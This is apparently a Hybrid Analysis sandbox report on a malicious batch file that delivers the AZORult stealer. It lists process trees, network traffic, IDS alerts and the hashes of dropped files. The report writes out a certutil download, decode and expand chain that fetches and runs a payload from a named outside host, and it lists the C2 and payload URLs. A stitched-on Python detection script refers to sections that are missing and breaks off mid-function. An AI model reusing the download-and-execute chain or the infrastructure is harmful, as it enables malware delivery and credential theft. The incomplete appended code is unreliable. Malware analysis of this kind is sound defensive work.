- ASCII text, with very long lines, with CRLF line terminators
- Architecture
- WINDOWS
- SHA256
- 5f6041fcc62f89d8eae2c445e3f5f8ed9240a5c67ab572ceabcd38dd82a1fc20
- MD5
- ca534f372c4a9955ef9033a3dbde4e6a
- SHA1
- e9a69f785538793a11a7d17526a256ebe4e9fd03
Hybrid Analysis
Analysed 7 processes in total.
-
cmd.exe
%WINDIR%\system32\cmd.exe /c ""C:\VT6784985745.bat" "
(PID: 1064)
- certutil.exe certutil -urlcache -split -f http://www.illumania.net/login.php %TEMP%\ercg345c24.txt (PID: 3948)
- certutil.exe certutil -decode %TEMP%\ercg345c24.txt %TEMP%\ercg345c24.cab (PID: 3128)
- expand.exe expand %TEMP%\ercg345c24.cab %TEMP%\ercg345c24.exe (PID: 2512)
- ercg345c24.exe (PID: 3852)
Network Analysis
DNS Requests
Domain | Address | TTL | Registrar | Country |
---|---|---|---|---|
www.webproj.com.br | 177.185.194.174 | 3599 | - | Brazil |
www.illumania.net | 70.40.203.216 | 14399 | FastDomain Inc. (Name Server: NS1.BLUEHOST.COM; Creation Date: Mon, 23 Nov 2009 23:54:21 GMT) | United States |
login.giocherialaragnatela.it | 93.170.105.132 | 899 | - | Czech Republic |
Contacted Hosts
IP Address | Port/Protocol | Associated Process | Details |
---|---|---|---|
70.40.203.216 | 80/TCP | certutil.exe (PID: 3948) | United States |
93.170.105.132 | 80/TCP | ercg345c24.exe (PID: 3852) | Czech Republic |
177.185.194.174 | 80/TCP | ercg345c24.exe (PID: 3852) | Brazil |
HTTP Traffic
Endpoint | Request | URL | Request headers | Response |
---|---|---|---|---|
70.40.203.216:80 (www.illumania.net) | GET | www.illumania.net/login.php | GET /login.php HTTP/1.1; Cache-Control: no-cache; Connection: Keep-Alive; Pragma: no-cache; Accept: */*; User-Agent: Microsoft-CryptoAPI/6.1; Host: www.illumania.net | 200 OK |
70.40.203.216:80 (www.illumania.net) | GET | www.illumania.net/login.php | GET /login.php HTTP/1.1; Accept: */*; User-Agent: CertUtil URL Agent; Host: www.illumania.net; Cache-Control: no-cache | 200 OK |
93.170.105.132:80 (login.giocherialaragnatela.it) | POST | login.giocherialaragnatela.it/azs/index.php | POST /azs/index.php HTTP/1.0; Host: login.giocherialaragnatela.it; Connection: close; Content-Length: 113; Accept-Language: en-US; Content-Type: application/octet-stream | 200 OK |
93.170.105.132:80 (login.giocherialaragnatela.it) | POST | login.giocherialaragnatela.it/azs/index.php | POST /azs/index.php HTTP/1.0; Host: login.giocherialaragnatela.it; Connection: close; Content-Length: 972929; Accept-Language: en-US; Content-Type: application/octet-stream | 200 OK |
177.185.194.174:80 (www.webproj.com.br) | GET | www.webproj.com.br/s/sort.exe | GET /s/sort.exe HTTP/1.0; Host: www.webproj.com.br; Connection: close; Accept-Language: en-US | 200 OK |
Suricata Alerts
Event | Category | Description | SID |
---|---|---|---|
local -> 70.40.203.216:80 (TCP) | Potential Corporate Privacy Violation | ETPRO POLICY Observed MS Certutil User-Agent in HTTP Request | 2829988 |
local -> 93.170.105.132:80 (TCP) | A Network Trojan was detected | ETPRO TROJAN AZORult Variant.3 Checkin M1 | 2829890 |
local -> 93.170.105.132:80 (TCP) | A Network Trojan was detected | ETPRO TROJAN AZORult Variant.3 Checkin M2 | 2831079 |
177.185.194.174 -> local:49179 (TCP) | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP | 2018959 |
177.185.194.174 -> local:49179 (TCP) | Misc activity | ET INFO EXE IsDebuggerPresent (Used in Malware Anti-Debugging) | 2015744 |
Extracted Files
Displaying 55 extracted file(s). The remaining 2 file(s) are available in the full version and XML/JSON reports.
-
Clean 23
-
-
api-ms-win-core-debug-l1-1-0.dll
- Size
- 18KiB (18232 bytes)
- Type
- pedll executable
- Description
- PE32 executable (DLL) (console) Intel 80386, for MS Windows
- AV Scan Result
- 0/67
- Runtime Process
- ercg345c24.exe (PID: 3852)
- MD5
- 88ff191fd8648099592ed28ee6c442a5
- SHA1
- 6a4f818b53606a5602c609ec343974c2103bc9cc
- SHA256
- c310cc91464c9431ab0902a561af947fa5c973925ff70482d3de017ed3f73b7d
-
api-ms-win-core-file-l1-1-0.dll
- Size
- 21KiB (21816 bytes)
- Type
- pedll executable
- Description
- PE32 executable (DLL) (console) Intel 80386, for MS Windows
- AV Scan Result
- 0/67
- Runtime Process
- ercg345c24.exe (PID: 3852)
- MD5
- 94ae25c7a5497ca0be6882a00644ca64
- SHA1
- f7ac28bbc47e46485025a51eeb6c304b70cee215
- SHA256
- 7ea06b7050f9ea2bcc12af34374bdf1173646d4e5ebf66ad690b37f4df5f3d4e
-
api-ms-win-core-handle-l1-1-0.dll
- Size
- 18KiB (18232 bytes)
- Type
- pedll executable
- Description
- PE32 executable (DLL) (console) Intel 80386, for MS Windows
- AV Scan Result
- 0/63
- Runtime Process
- ercg345c24.exe (PID: 3852)
- MD5
- 6db54065b33861967b491dd1c8fd8595
- SHA1
- ed0938bbc0e2a863859aad64606b8fc4c69b810a
- SHA256
- 945cc64ee04b1964c1f9fcdc3124dd83973d332f5cfb696cdf128ca5c4cbd0e5
-
api-ms-win-core-libraryloader-l1-1-0.dll
- Size
- 18KiB (18744 bytes)
- Type
- pedll executable
- Description
- PE32 executable (DLL) (console) Intel 80386, for MS Windows
- AV Scan Result
- 0/63
- Runtime Process
- ercg345c24.exe (PID: 3852)
- MD5
- d0873e21721d04e20b6ffb038accf2f1
- SHA1
- 9e39e505d80d67b347b19a349a1532746c1f7f88
- SHA256
- bb25ccf8694d1fcfce85a7159dcf6985fdb54728d29b021cb3d14242f65909ce
-
api-ms-win-core-processenvironment-l1-1-0.dll
- Size
- 19KiB (19248 bytes)
- Type
- pedll executable
- Description
- PE32 executable (DLL) (console) Intel 80386, for MS Windows
- AV Scan Result
- 0/67
- Runtime Process
- ercg345c24.exe (PID: 3852)
- MD5
- 5f73a814936c8e7e4a2dfd68876143c8
- SHA1
- d960016c4f553e461afb5b06b039a15d2e76135e
- SHA256
- 96898930ffb338da45497be019ae1adcd63c5851141169d3023e53ce4c7a483e
-
api-ms-win-core-processthreads-l1-1-0.dll
- Size
- 19KiB (19392 bytes)
- Type
- pedll executable
- Description
- PE32 executable (DLL) (console) Intel 80386, for MS Windows
- AV Scan Result
- 0/67
- Runtime Process
- ercg345c24.exe (PID: 3852)
- MD5
- a2d7d7711f9c0e3e065b2929ff342666
- SHA1
- a17b1f36e73b82ef9bfb831058f187535a550eb8
- SHA256
- 9dab884071b1f7d7a167f9bec94ba2bee875e3365603fa29b31de286c6a97a1d
-
api-ms-win-core-profile-l1-1-0.dll
- Size
- 17KiB (17712 bytes)
- Type
- pedll executable
- Description
- PE32 executable (DLL) (console) Intel 80386, for MS Windows
- AV Scan Result
- 0/68
- Runtime Process
- ercg345c24.exe (PID: 3852)
- MD5
- fee0926aa1bf00f2bec9da5db7b2de56
- SHA1
- f5a4eb3d8ac8fb68af716857629a43cd6be63473
- SHA256
- 8eb5270fa99069709c846db38be743a1a80a42aa1a88776131f79e1d07cc411c
-
api-ms-win-core-synch-l1-1-0.dll
- Size
- 20KiB (20280 bytes)
- Type
- pedll executable
- Description
- PE32 executable (DLL) (console) Intel 80386, for MS Windows
- AV Scan Result
- 0/67
- Runtime Process
- ercg345c24.exe (PID: 3852)
- MD5
- 71af7ed2a72267aaad8564524903cff6
- SHA1
- 8a8437123de5a22ab843adc24a01ac06f48db0d3
- SHA256
- 5dd4ccd63e6ed07ca3987ab5634ca4207d69c47c2544dfefc41935617652820f
-
api-ms-win-core-sysinfo-l1-1-0.dll
- Size
- 19KiB (19248 bytes)
- Type
- pedll executable
- Description
- PE32 executable (DLL) (console) Intel 80386, for MS Windows
- AV Scan Result
- 0/67
- Runtime Process
- ercg345c24.exe (PID: 3852)
- MD5
- 19a40af040bd7add901aa967600259d9
- SHA1
- 05b6322979b0b67526ae5cd6e820596cbe7393e4
- SHA256
- 4b704b36e1672ae02e697efd1bf46f11b42d776550ba34a90cd189f6c5c61f92
-
api-ms-win-core-util-l1-1-0.dll
- Size
- 18KiB (18232 bytes)
- Type
- pedll executable
- Description
- PE32 executable (DLL) (console) Intel 80386, for MS Windows
- AV Scan Result
- 0/67
- Runtime Process
- ercg345c24.exe (PID: 3852)
- MD5
- 0f079489abd2b16751ceb7447512a70d
- SHA1
- 679dd712ed1c46fbd9bc8615598da585d94d5d87
- SHA256
- f7d450a0f59151bcefb98d20fcae35f76029df57138002db5651d1b6a33adc86
-
api-ms-win-crt-convert-l1-1-0.dll
- Size
- 22KiB (22328 bytes)
- Type
- pedll executable
- Description
- PE32 executable (DLL) (console) Intel 80386, for MS Windows
- AV Scan Result
- 0/67
- Runtime Process
- ercg345c24.exe (PID: 3852)
- MD5
- 72e28c902cd947f9a3425b19ac5a64bd
- SHA1
- 9b97f7a43d43cb0f1b87fc75fef7d9eeea11e6f7
- SHA256
- 3cc1377d495260c380e8d225e5ee889cbb2ed22e79862d4278cfa898e58e44d1
-
api-ms-win-crt-environment-l1-1-0.dll
- Size
- 18KiB (18736 bytes)
- Type
- pedll executable
- Description
- PE32 executable (DLL) (console) Intel 80386, for MS Windows
- AV Scan Result
- 0/67
- Runtime Process
- ercg345c24.exe (PID: 3852)
- MD5
- ac290dad7cb4ca2d93516580452eda1c
- SHA1
- fa949453557d0049d723f9615e4f390010520eda
- SHA256
- c0d75d1887c32a1b1006b3cffc29df84a0d73c435cdcb404b6964be176a61382
-
api-ms-win-crt-multibyte-l1-1-0.dll
- Size
- 26KiB (26424 bytes)
- Type
- pedll executable
- Description
- PE32 executable (DLL) (console) Intel 80386, for MS Windows
- AV Scan Result
- 0/68
- Runtime Process
- ercg345c24.exe (PID: 3852)
- MD5
- 35fc66bd813d0f126883e695664e7b83
- SHA1
- 2fd63c18cc5dc4defc7ea82f421050e668f68548
- SHA256
- 66abf3a1147751c95689f5bc6a259e55281ec3d06d3332dd0ba464effa716735
-
api-ms-win-crt-private-l1-1-0.dll
- Size
- 71KiB (73016 bytes)
- Type
- pedll executable
- Description
- PE32 executable (DLL) (console) Intel 80386, for MS Windows
- AV Scan Result
- 0/67
- Runtime Process
- ercg345c24.exe (PID: 3852)
- MD5
- 9910a1bfdc41c5b39f6af37f0a22aacd
- SHA1
- 47fa76778556f34a5e7910c816c78835109e4050
- SHA256
- 65ded8d2ce159b2f5569f55b2caf0e2c90f3694bd88c89de790a15a49d8386b9
-
api-ms-win-crt-stdio-l1-1-0.dll
- Size
- 24KiB (24368 bytes)
- Type
- pedll executable
- Description
- PE32 executable (DLL) (console) Intel 80386, for MS Windows
- AV Scan Result
- 0/67
- Runtime Process
- ercg345c24.exe (PID: 3852)
- MD5
- fefb98394cb9ef4368da798deab00e21
- SHA1
- 316d86926b558c9f3f6133739c1a8477b9e60740
- SHA256
- b1e702b840aebe2e9244cd41512d158a43e6e9516cd2015a84eb962fa3ff0df7
-
api-ms-win-crt-string-l1-1-0.dll
- Size
- 23KiB (23488 bytes)
- Type
- pedll executable
- Description
- PE32 executable (DLL) (console) Intel 80386, for MS Windows
- AV Scan Result
- 0/63
- Runtime Process
- ercg345c24.exe (PID: 3852)
- MD5
- 404604cd100a1e60dfdaf6ecf5ba14c0
- SHA1
- 58469835ab4b916927b3cabf54aee4f380ff6748
- SHA256
- 73cc56f20268bfb329ccd891822e2e70dd70fe21fc7101deb3fa30c34a08450c
-
api-ms-win-crt-time-l1-1-0.dll
- Size
- 20KiB (20792 bytes)
- Type
- pedll executable
- Description
- PE32 executable (DLL) (console) Intel 80386, for MS Windows
- AV Scan Result
- 0/63
- Runtime Process
- ercg345c24.exe (PID: 3852)
- MD5
- 849f2c3ebf1fcba33d16153692d5810f
- SHA1
- 1f8eda52d31512ebfdd546be60990b95c8e28bfb
- SHA256
- 69885fd581641b4a680846f93c2dd21e5dd8e3ba37409783bc5b3160a919cb5d
-
api-ms-win-crt-utility-l1-1-0.dll
- Size
- 18KiB (18744 bytes)
- Type
- pedll executable
- Description
- PE32 executable (DLL) (console) Intel 80386, for MS Windows
- AV Scan Result
- 0/67
- Runtime Process
- ercg345c24.exe (PID: 3852)
- MD5
- b52a0ca52c9c207874639b62b6082242
- SHA1
- 6fb845d6a82102ff74bd35f42a2844d8c450413b
- SHA256
- a1d1d6b0cb0a8421d7c0d1297c4c389c95514493cd0a386b49dc517ac1b9a2b0
-
freebl3.dll
- Size
- 325KiB (332752 bytes)
- Type
- pedll executable
- Description
- PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
- AV Scan Result
- 0/63
- Runtime Process
- ercg345c24.exe (PID: 3852)
- MD5
- 343aa83574577727aabe537dccfdeafc
- SHA1
- 9ce3b9a182429c0dba9821e2e72d3ab46f5d0a06
- SHA256
- 393ae7f06fe6cd19ea6d57a93dd0acd839ee39ba386cf1ca774c4c59a3bfebd8
-
msvcp140.dll
- Size
- 430KiB (440120 bytes)
- Type
- pedll executable
- Description
- PE32 executable (DLL) (console) Intel 80386, for MS Windows
- AV Scan Result
- 0/66
- Runtime Process
- ercg345c24.exe (PID: 3852)
- MD5
- 109f0f02fd37c84bfc7508d4227d7ed5
- SHA1
- ef7420141bb15ac334d3964082361a460bfdb975
- SHA256
- 334e69ac9367f708ce601a6f490ff227d6c20636da5222f148b25831d22e13d4
-
api-ms-win-core-file-l1-2-0.dll
- Size
- 18KiB (18232 bytes)
- Type
- pedll executable
- Description
- PE32 executable (DLL) (console) Intel 80386, for MS Windows
- AV Scan Result
- 0/68
- Runtime Process
- ercg345c24.exe (PID: 3852)
- MD5
- e2f648ae40d234a3892e1455b4dbbe05
- SHA1
- d9d750e828b629cfb7b402a3442947545d8d781b
- SHA256
- c8c499b012d0d63b7afc8b4ca42d6d996b2fcf2e8b5f94cacfbec9e6f33e8a03
-
api-ms-win-core-processthreads-l1-1-1.dll
- Size
- 18KiB (18744 bytes)
- Type
- pedll executable
- Description
- PE32 executable (DLL) (console) Intel 80386, for MS Windows
- AV Scan Result
- 0/67
- Runtime Process
- ercg345c24.exe (PID: 3852)
- MD5
- d0289835d97d103bad0dd7b9637538a1
- SHA1
- 8ceebe1e9abb0044808122557de8aab28ad14575
- SHA256
- 91eeb842973495deb98cef0377240d2f9c3d370ac4cf513fd215857e9f265a6a
-
api-ms-win-core-timezone-l1-1-0.dll
- Size
- 18KiB (18224 bytes)
- Type
- pedll executable
- Description
- PE32 executable (DLL) (console) Intel 80386, for MS Windows
- AV Scan Result
- 0/68
- Runtime Process
- ercg345c24.exe (PID: 3852)
- MD5
- babf80608fd68a09656871ec8597296c
- SHA1
- 33952578924b0376ca4ae6a10b8d4ed749d10688
- SHA256
- 24c9aa0b70e557a49dac159c825a013a71a190df5e7a837bfa047a06bba59eca
-
-
Informative Selection 3
-
-
ercg345c24.cab
- Size
- 135KiB (138377 bytes)
- Type
- data
- Description
- Microsoft Cabinet archive data, 138377 bytes, 1 file
- Runtime Process
- expand.exe (PID: 2512)
- MD5
- 8140a9fa5dc6e4eab7f91ea58f2acfa3
- SHA1
- 457a9e48812f7dcef295e4ecc42c836331d2acb4
- SHA256
- c9a0756d5a70de7d414016b58bb02b3ce7f8428c748fde9ac57587df5ac167ab
-
ercg345c24.txt
- Size
- 186KiB (190328 bytes)
- Type
- text
- Description
- ASCII text, with CRLF line terminators
- Runtime Process
- certutil.exe (PID: 3948)
- MD5
- e921b9e8e7d0278f58f658e4968ed3c9
- SHA1
- 33f506cb208b1f379bfd7e00e869cf6429112528
- SHA256
- 23273702b85f6ef58f45429dd117bb55b4701bd078745d362feb3ff6b76918c6
-
urlref_httpwww.illumania.netlogin.php
- Size
- 186KiB (190328 bytes)
- Type
- text
- Description
- ASCII text, with CRLF line terminators
- Context
- http://www.illumania.net/login.php
- MD5
- e921b9e8e7d0278f58f658e4968ed3c9
- SHA1
- 33f506cb208b1f379bfd7e00e869cf6429112528
- SHA256
- 23273702b85f6ef58f45429dd117bb55b4701bd078745d362feb3ff6b76918c6
-
-
Informative 29
-
-
login[1].htm
- Size
- 186KiB (190328 bytes)
- Runtime Process
- certutil.exe (PID: 3948)
- MD5
- e921b9e8e7d0278f58f658e4968ed3c9
- SHA1
- 33f506cb208b1f379bfd7e00e869cf6429112528
- SHA256
- 23273702b85f6ef58f45429dd117bb55b4701bd078745d362feb3ff6b76918c6
-
75FD879489CB57C12C7CF88E14EA37C5
- Size
- 186B (186 bytes)
- Runtime Process
- certutil.exe (PID: 3948)
- MD5
- ddc1cf6502fdcd4bab0363b84477f142
- SHA1
- aeccea7493d9707d217d833666d1180461764c73
- SHA256
- ed1fe96d7975c4b79311d89399658943d2618d2cb1d2192277b16185dca466ac
-
218f98763775034fb6c9e84dafefab70.tmp
- Size
- 204KiB (208384 bytes)
- Runtime Process
- expand.exe (PID: 2512)
- MD5
- e869be82922e2f3ae3ecba8e0501cb63
- SHA1
- 6bbc7639f25449cb36d5c974907da96d728a7069
- SHA256
- 5a26ee59d66a3e390ebc45a8c9c2a08196135c206fd9b43024bd27ef8e0c30b2
-
api-ms-win-core-console-l1-1-0.dll
- Size
- 18KiB (18744 bytes)
- Type
- pedll executable
- Description
- PE32 executable (DLL) (console) Intel 80386, for MS Windows
- Runtime Process
- ercg345c24.exe (PID: 3852)
- MD5
- 502263c56f931df8440d7fd2fa7b7c00
- SHA1
- 523a3d7c3f4491e67fc710575d8e23314db2c1a2
- SHA256
- 94a5df1227818edbfd0d5091c6a48f86b4117c38550343f780c604eee1cd6231
-
api-ms-win-core-datetime-l1-1-0.dll
- Size
- 18KiB (18232 bytes)
- Type
- pedll executable
- Description
- PE32 executable (DLL) (console) Intel 80386, for MS Windows
- Runtime Process
- ercg345c24.exe (PID: 3852)
- MD5
- cb978304b79ef53962408c611dfb20f5
- SHA1
- eca42f7754fb0017e86d50d507674981f80bc0b9
- SHA256
- 90fae0e7c3644a6754833c42b0ac39b6f23859f9a7cf4b6c8624820f59b9dad3
-
api-ms-win-core-errorhandling-l1-1-0.dll
- Size
- 18KiB (18232 bytes)
- Type
- pedll executable
- Description
- PE32 executable (DLL) (console) Intel 80386, for MS Windows
- Runtime Process
- ercg345c24.exe (PID: 3852)
- MD5
- 6d778e83f74a4c7fe4c077dc279f6867
- SHA1
- f5d9cf848f79a57f690da9841c209b4837c2e6c3
- SHA256
- a97dcca76cdb12e985dff71040815f28508c655ab2b073512e386dd63f4da325
-
api-ms-win-core-heap-l1-1-0.dll
- Size
- 18KiB (18232 bytes)
- Type
- pedll executable
- Description
- PE32 executable (DLL) (console) Intel 80386, for MS Windows
- Runtime Process
- ercg345c24.exe (PID: 3852)
- MD5
- 2ea3901d7b50bf6071ec8732371b821c
- SHA1
- e7be926f0f7d842271f7edc7a4989544f4477da7
- SHA256
- 44f6df4280c8ecc9c6e609b1a4bfee041332d337d84679cfe0d6678ce8f2998a
-
api-ms-win-core-interlocked-l1-1-0.dll
- Size
- 17KiB (17856 bytes)
- Type
- pedll executable
- Description
- PE32 executable (DLL) (console) Intel 80386, for MS Windows
- Runtime Process
- ercg345c24.exe (PID: 3852)
- MD5
- d97a1cb141c6806f0101a5ed2673a63d
- SHA1
- d31a84c1499a9128a8f0efea4230fcfa6c9579be
- SHA256
- deccd75fc3fc2bb31338b6fe26deffbd7914c6cd6a907e76fd4931b7d141718c
-
api-ms-win-core-memory-l1-1-0.dll
- Size
- 18KiB (18744 bytes)
- Type
- pedll executable
- Description
- PE32 executable (DLL) (console) Intel 80386, for MS Windows
- Runtime Process
- ercg345c24.exe (PID: 3852)
- MD5
- d500d9e24f33933956df0e26f087fd91
- SHA1
- 6c537678ab6cfd6f3ea0dc0f5abefd1c4924f0c0
- SHA256
- bb33a9e906a5863043753c44f6f8165afe4d5edb7e55efa4c7e6e1ed90778eca
-
api-ms-win-core-namedpipe-l1-1-0.dll
- Size
- 18KiB (18232 bytes)
- Type
- pedll executable
- Description
- PE32 executable (DLL) (console) Intel 80386, for MS Windows
- Runtime Process
- ercg345c24.exe (PID: 3852)
- MD5
- 6f6796d1278670cce6e2d85199623e27
- SHA1
- 8aa2155c3d3d5aa23f56cd0bc507255fc953ccc3
- SHA256
- c4f60f911068ab6d7f578d449ba7b5b9969f08fc683fd0ce8e2705bbf061f507
-
api-ms-win-core-rtlsupport-l1-1-0.dll
- Size
- 17KiB (17720 bytes)
- Type
- pedll executable
- Description
- PE32 executable (DLL) (console) Intel 80386, for MS Windows
- Runtime Process
- ercg345c24.exe (PID: 3852)
- MD5
- fdba0db0a1652d86cd471eaa509e56ea
- SHA1
- 3197cb45787d47bac80223e3e98851e48a122efa
- SHA256
- 2257fea1e71f7058439b3727ed68ef048bd91dcacd64762eb5c64a9d49df0b57
-
api-ms-win-core-string-l1-1-0.dll
- Size
- 18KiB (18232 bytes)
- Type
- pedll executable
- Description
- PE32 executable (DLL) (console) Intel 80386, for MS Windows
- Runtime Process
- ercg345c24.exe (PID: 3852)
- MD5
- 12cc7d8017023ef04ebdd28ef9558305
- SHA1
- f859a66009d1caae88bf36b569b63e1fbdae9493
- SHA256
- 7670fdede524a485c13b11a7c878015e9b0d441b7d8eb15ca675ad6b9c9a7311
-
api-ms-win-crt-conio-l1-1-0.dll
- Size
- 19KiB (19256 bytes)
- Type
- pedll executable
- Description
- PE32 executable (DLL) (console) Intel 80386, for MS Windows
- Runtime Process
- ercg345c24.exe (PID: 3852)
- MD5
- 6ea692f862bdeb446e649e4b2893e36f
- SHA1
- 84fceae03d28ff1907048acee7eae7e45baaf2bd
- SHA256
- 9ca21763c528584bdb4efebe914faaf792c9d7360677c87e93bd7ba7bb4367f2
-
api-ms-win-crt-filesystem-l1-1-0.dll
- Size
- 20KiB (20280 bytes)
- Type
- pedll executable
- Description
- PE32 executable (DLL) (console) Intel 80386, for MS Windows
- Runtime Process
- ercg345c24.exe (PID: 3852)
- MD5
- aec2268601470050e62cb8066dd41a59
- SHA1
- 363ed259905442c4e3b89901bfd8a43b96bf25e4
- SHA256
- 7633774effe7c0add6752ffe90104d633fc8262c87871d096c2fc07c20018ed2
-
api-ms-win-crt-heap-l1-1-0.dll
- Size
- 19KiB (19256 bytes)
- Type
- pedll executable
- Description
- PE32 executable (DLL) (console) Intel 80386, for MS Windows
- Runtime Process
- ercg345c24.exe (PID: 3852)
- MD5
- 93d3da06bf894f4fa21007bee06b5e7d
- SHA1
- 1e47230a7ebcfaf643087a1929a385e0d554ad15
- SHA256
- f5cf623ba14b017af4aec6c15eee446c647ab6d2a5dee9d6975adc69994a113d
-
api-ms-win-crt-locale-l1-1-0.dll
- Size
- 18KiB (18744 bytes)
- Type
- pedll executable
- Description
- PE32 executable (DLL) (console) Intel 80386, for MS Windows
- Runtime Process
- ercg345c24.exe (PID: 3852)
- MD5
- a2f2258c32e3ba9abf9e9e38ef7da8c9
- SHA1
- 116846ca871114b7c54148ab2d968f364da6142f
- SHA256
- 565a2eec5449eeeed68b430f2e9b92507f979174f9c9a71d0c36d58b96051c33
-
api-ms-win-crt-math-l1-1-0.dll
- Size
- 28KiB (28984 bytes)
- Type
- pedll executable
- Description
- PE32 executable (DLL) (console) Intel 80386, for MS Windows
- Runtime Process
- ercg345c24.exe (PID: 3852)
- MD5
- 8b0ba750e7b15300482ce6c961a932f0
- SHA1
- 71a2f5d76d23e48cef8f258eaad63e586cfc0e19
- SHA256
- bece7bab83a5d0ec5c35f0841cbbf413e01ac878550fbdb34816ed55185dcfed
-
api-ms-win-crt-process-l1-1-0.dll
- Size
- 19KiB (19256 bytes)
- Type
- pedll executable
- Description
- PE32 executable (DLL) (console) Intel 80386, for MS Windows
- Runtime Process
- ercg345c24.exe (PID: 3852)
- MD5
- 8d02dd4c29bd490e672d271700511371
- SHA1
- f3035a756e2e963764912c6b432e74615ae07011
- SHA256
- c03124ba691b187917ba79078c66e12cbf5387a3741203070ba23980aa471e8b
-
api-ms-win-crt-runtime-l1-1-0.dll
- Size
- 22KiB (22840 bytes)
- Type
- pedll executable
- Description
- PE32 executable (DLL) (console) Intel 80386, for MS Windows
- Runtime Process
- ercg345c24.exe (PID: 3852)
- MD5
- 41a348f9bedc8681fb30fa78e45edb24
- SHA1
- 66e76c0574a549f293323dd6f863a8a5b54f3f9b
- SHA256
- c9bbc07a033bab6a828ecc30648b501121586f6f53346b1cd0649d7b648ea60b
-
mozglue.dll
- Size
- 136KiB (139216 bytes)
- Type
- pedll executable
- Description
- PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
- Runtime Process
- ercg345c24.exe (PID: 3852)
- MD5
- 9e682f1eb98a9d41468fc3e50f907635
- SHA1
- 85e0ceca36f657ddf6547aa0744f0855a27527ee
- SHA256
- 830533bb569594ec2f7c07896b90225006b90a9af108f49d6fb6bebd02428b2d
-
nss3.dll
- Size
- 1.2MiB (1244112 bytes)
- Type
- pedll executable
- Description
- PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
- Runtime Process
- ercg345c24.exe (PID: 3852)
- MD5
- 556ea09421a0f74d31c4c0a89a70dc23
- SHA1
- f739ba9b548ee64b13eb434a3130406d23f836e3
- SHA256
- f0e6210d4a0d48c7908d8d1c270449c91eb4523e312a61256833bfeaf699abfb
-
nssdbm3.dll
- Size
- 90KiB (92624 bytes)
- Type
- pedll executable
- Description
- PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
- Runtime Process
- ercg345c24.exe (PID: 3852)
- MD5
- 569a7a65658a46f9412bdfa04f86e2b2
- SHA1
- 44cc0038e891ae73c43b61a71a46c97f98b1030d
- SHA256
- 541a293c450e609810279f121a5e9dfa4e924d52e8b0c6c543512b5026efe7ec
-
softokn3.dll
- Size
- 141KiB (144336 bytes)
- Type
- pedll executable
- Description
- PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
- Runtime Process
- ercg345c24.exe (PID: 3852)
- MD5
- 67827db2380b5848166a411bae9f0632
- SHA1
- f68f1096c5a3f7b90824aa0f7b9da372228363ff
- SHA256
- 9a7f11c212d61856dfc494de111911b7a6d9d5e9795b0b70bbbc998896f068ae
-
ucrtbase.dll
- Size
- 1.1MiB (1142072 bytes)
- Type
- pedll executable
- Description
- PE32 executable (DLL) (console) Intel 80386, for MS Windows
- Runtime Process
- ercg345c24.exe (PID: 3852)
- MD5
- d6326267ae77655f312d2287903db4d3
- SHA1
- 1268bef8e2ca6ebc5fb974fdfaff13be5ba7574f
- SHA256
- 0bb8c77de80acf9c43de59a8fd75e611cc3eb8200c69f11e94389e8af2ceb7a9
-
vcruntime140.dll
- Size
- 82KiB (83784 bytes)
- Type
- pedll executable
- Description
- PE32 executable (DLL) (console) Intel 80386, for MS Windows
- Runtime Process
- ercg345c24.exe (PID: 3852)
- MD5
- 7587bf9cb4147022cd5681b015183046
- SHA1
- f2106306a8f6f0da5afb7fc765cfa0757ad5a628
- SHA256
- c40bb03199a2054dabfc7a8e01d6098e91de7193619effbd0f142a7bf031c14d
-
api-ms-win-core-file-l2-1-0.dll
- Size
- 18KiB (18232 bytes)
- Type
- pedll executable
- Description
- PE32 executable (DLL) (console) Intel 80386, for MS Windows
- Runtime Process
- ercg345c24.exe (PID: 3852)
- MD5
- e479444bdd4ae4577fd32314a68f5d28
- SHA1
- 77edf9509a252e886d4da388bf9c9294d95498eb
- SHA256
- c85dc081b1964b77d289aac43cc64746e7b141d036f248a731601eb98f827719
-
api-ms-win-core-localization-l1-2-0.dll
- Size
- 20KiB (20792 bytes)
- Type
- pedll executable
- Description
- PE32 executable (DLL) (console) Intel 80386, for MS Windows
- Runtime Process
- ercg345c24.exe (PID: 3852)
- MD5
- eff11130bfe0d9c90c0026bf2fb219ae
- SHA1
- cf4c89a6e46090d3d8feeb9eb697aea8a26e4088
- SHA256
- 03ad57c24ff2cf895b5f533f0ecbd10266fd8634c6b9053cc9cb33b814ad5d97
-
api-ms-win-core-synch-l1-2-0.dll
- Size
- 18KiB (18744 bytes)
- Type
- pedll executable
- Description
- PE32 executable (DLL) (console) Intel 80386, for MS Windows
- Runtime Process
- ercg345c24.exe (PID: 3852)
- MD5
- 0d1aa99ed8069ba73cfd74b0fddc7b3a
- SHA1
- ba1f5384072df8af5743f81fd02c98773b5ed147
- SHA256
- 30d99ce1d732f6c9cf82671e1d9088aa94e720382066b79175e2d16778a3dad1
-
sort.exe
- Size
- 536KiB (548864 bytes)
- Type
- peexe executable
- Description
- PE32 executable (GUI) Intel 80386, for MS Windows
- MD5
- 557f802cc4e781efa055dad5c817585e
- SHA1
- 4441defb9cb1be7a2b5d2d576ec92f6a98614754
- SHA256
- ebd84c2b5c26cb2c4c42a4cbe1bc57c001f72cd4130b6f83c0e100b98d84a221
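The sort.exe entry above is a 548864-byte GUI PE carrying a Windows system-tool name, and the Notifications below list the other processes in the chain (certutil.exe, expand.exe, cmd.exe, ercg345c24.exe). The following is an added detection example, not part of the sandbox report: it evaluates process-creation events for the two behaviours this chain exposes, a system-tool name running from outside a Windows directory (T1036) and certutil/expand being used to deobfuscate a dropped file (T1140). The events are constructed to mirror the report's file names; the full paths, the %TEMP% form of the decode command, the expand command line and the certutil -urlcache rule are assumptions, not telemetry from this report.

```python
"""Process-creation triage for the certutil/expand/sort.exe chain.

Added example, not code from the sandbox report. SAMPLE_EVENTS are
constructed; paths and command lines are assumptions.
"""
import ntpath
import re

# Windows tool names seen in this chain; extend with the rest of your estate.
SYSTEM_TOOL_NAMES = {"sort.exe", "certutil.exe", "expand.exe", "cmd.exe"}
WINDOWS_PREFIX = "c:\\windows\\"          # covers System32 and SysWOW64 too
TEMP_DIR = re.compile(r"(?i)(%temp%|\\temp)\\")


def is_windows_path(image: str) -> bool:
    return image.lower().startswith(WINDOWS_PREFIX)


def triage_event(ev: dict) -> list:
    """Return (ATT&CK id, reason) findings for one process-creation event."""
    image, cmd = ev["image"], ev["command_line"]
    name = ntpath.basename(image).lower()
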